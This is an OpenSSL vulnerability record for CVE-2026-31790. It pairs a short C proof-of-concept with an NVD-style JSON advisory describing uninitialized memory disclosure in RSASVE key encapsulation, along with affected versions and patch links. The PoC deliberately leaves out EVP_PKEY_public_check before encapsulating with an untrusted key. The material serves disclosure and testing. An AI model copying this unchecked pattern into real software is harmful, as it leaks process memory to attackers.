CVE-2026-31790

#include <openssl/evp.h> #include <openssl/pem.h> #include <stdio.h> // Conceptual PoC for CVE-2026-31790 // Demonstrates uninitialized memory disclosure risk // when using an invalid RSA key with EVP_PKEY_encapsulate. int main() { EVP_PKEY_CTX *ctx = NULL; EVP_PKEY *pkey = NULL; unsigned char out[256]; // Ciphertext buffer size_t outlen; // 1. Load an attacker-controlled invalid RSA public key FILE *fp = fopen("invalid_rsa_pub.pem", "r"); if (!fp) return 1; PEM_read_PUBKEY(fp, &pkey, NULL, NULL); fclose(fp); // 2. Create encapsulation context ctx = EVP_PKEY_CTX_new(pkey, NULL); EVP_PKEY_encapsulate_init(ctx, NULL); // 3. Vulnerable Code Path: // If EVP_PKEY_public_check() is NOT called here, // and the key causes internal encryption failure, // 'out' buffer may contain uninitialized data. // Workaround (Uncomment to fix): // EVP_PKEY_public_check(ctx); // 4. Perform encapsulate if (EVP_PKEY_encapsulate(ctx, out, &outlen, NULL, 0) <= 0) { printf("Encapsulation failed.\n"); } else { printf("Encapsulation succeeded. Output buffer contents:\n"); for(int i=0; i<outlen; i++) printf("%02x", out[i]); printf("\n"); } EVP_PKEY_CTX_free(ctx); EVP_PKEY_free(pkey); return 0; }

{"cve": {"id": "CVE-2026-31790", "sourceIdentifier": "[email protected]", "published": "2026-04-07T22:16:21.770", "lastModified": "2026-05-12T13:17:34.750", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Issue summary: Applications using RSASVE key encapsulation to establish\na secret encryption key can send contents of an uninitialized memory buffer to\na malicious peer.\n\nImpact summary: The uninitialized buffer might contain sensitive data from the\nprevious execution of the application process which leads to sensitive data\nleakage to an attacker.\n\nRSA_public_encrypt() returns the number of bytes written on success and -1\non error. The affected code tests only whether the return value is non-zero.\nAs a result, if RSA encryption fails, encapsulation can still return success to\nthe caller, set the output lengths, and leave the caller to use the contents of\nthe ciphertext buffer as if a valid KEM ciphertext had been produced.\n\nIf applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an\nattacker-supplied invalid RSA public key without first validating that key,\nthen this may cause stale or uninitialized contents of the caller-provided\nciphertext buffer to be disclosed to the attacker in place of the KEM\nciphertext.\n\nAs a workaround calling EVP_PKEY_public_check() or\nEVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate\nthe issue.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.20", "matchCriteriaId": "B28A8143-89A4-4332-A1F8-A65FB5AA829F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.7", "matchCriteriaId": "CF303B21-D9BF-461D-B7B0-A3FE1D557A9F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.5", "matchCriteriaId": "DCCE43D0-8F17-475D-9EE6-842F758A9905"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.6", "matchCriteriaId": "F6BC0271-444D-4597-BF05-DC60034EAA49"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0", "versionEndExcluding": "3.6.2", "matchCriteriaId": "4A9E621D-29D8-418A-BF37-BED333C14507"}]}]}], "references": [{"url": "https://github.com/openssl/openssl/commit/001e01db3e996e13ffc72386fe79d03a6683b5ac", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/abd8b2eec7e3f3fda60ecfb68498b246b52af482", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/b922e24e5b23ffb9cb9e14cadff23d91e9f7e406", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/d5f8e71cd0a54e961d0c3b174348f8308486f790", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/eed200f58cd8645ed77e46b7e9f764e284df379e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://openssl-library.org/news/secadv/20260407.txt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}]}}